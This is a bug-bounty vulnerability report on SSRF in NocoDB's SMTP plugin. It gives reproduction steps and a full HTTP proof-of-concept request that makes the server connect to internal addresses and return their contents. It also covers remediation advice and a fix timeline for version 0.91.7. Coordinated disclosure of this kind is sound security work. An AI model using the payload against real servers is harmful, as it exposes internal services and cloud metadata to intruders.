SSRF via Plugin SMTP in nocodb/nocodb

Valid

Reported on

Jun 9th 2022


Description

The SMTP plugin does not verify or validate the host and port supplied by the user, which allows an attacker to make the server connect to internal addresses and read the contents of the response.

Reproduce

  1. Go to Team & Settings
  2. App Store > SMTP
  3. Configure the plugin and intercept the Test request
  4. Change Host/Port to an internal address, for example 169.254.169.254, 192.168.0.1 or 127.0.0.1
  5. The response contains the contents of the connection.

Proof of Concept

POST /api/v1/db/meta/plugins/test HTTP/1.1
Host: 192.168.15.50:8080
Content-Length: 129
Accept: application/json, text/plain, */*
xc-gui: true
xc-auth: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Content-Type: application/json
Origin: http://192.168.15.50:8080
Referer: http://192.168.15.50:8080/dashboard/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: refresh_token=
Connection: close

{"input":{"from":"","host":"192.168.15.41","port":"1337","secure":""},"id":"nc_rb4gaggzddwut5","category":"Email","title":"SMTP"}

Response

{"msg":"Invalid greeting. response=[INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE: [INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE"}

Video Demo

https://drive.google.com/file/d/1hCJ8nXpssBRq7sV8JN73oXupN_zPWN-T/view?usp=sharing

Remediation

  • Validate and filter the host and port received from the user.
  • Use an allow-list containing only the IPs the application needs.
  • Do not return the connection content to the user.

Impact

SSRF to internal addresses: the attacker can make a request as the server and read its contents, which can lead to leakage of sensitive information.

Timeline

  • The platform processed the report and contacted the nocodb team, following up again after 7 days.
  • navi validated this vulnerability.
  • Jonatas has been awarded the disclosure bounty.
  • navi marked this as fixed in 0.91.7+ with commit a18f5d.
  • navi has been awarded the fix bounty.
  • This vulnerability will not receive a CVE.